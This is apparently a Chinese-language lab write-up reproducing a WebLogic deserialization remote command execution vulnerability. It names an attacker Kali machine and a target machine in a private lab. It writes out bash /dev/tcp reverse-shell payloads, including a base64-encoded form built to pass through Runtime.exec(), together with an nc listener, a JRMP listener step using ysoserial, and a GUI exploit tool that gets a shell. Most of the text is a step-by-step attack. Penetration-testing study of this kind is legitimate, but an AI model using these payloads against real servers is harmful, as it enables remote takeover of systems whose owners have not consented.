type
status
date
slug
summary
tags
category
icon
password
反序列化命令执行漏洞
影响版本
与weblogic的任意文件上传漏洞影响版本相同:
复现过程
工具下载
下载反序列化漏洞利用工具jar文件:ysoserial.jar
地址:https://github.com/frohoff/ysoserial。按照说明生成jar文件即可。
kali机ip: 192.168.110.131(攻击机)
靶机ip: 192.168.110.132
1. 反弹shell payload准备:
bash -i >& /dev/tcp/远端vps-ip/88880>&1
bash -i >& /dev/tcp/192.168.110.131/8888 0>&1
由于Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,所以我们使用base64的反弹shell形式,具体如下:
bash -c {echo,上面反弹shell的base64编码}|{base64,-d}|{bash,-i}
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMzEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}
2. 远端vps监听端口:
nc -lnvp 8888
3. 远端vps开启JRMP Server端口监听,端口随意,这里设置为38080
kali机ip: 192.168.110.131

出现Opening JRMP listener on 38080即表明jrmp server监听成功。
4. 使用工具WeblogicExploit-GUI

点击执行后,成功植入getshell
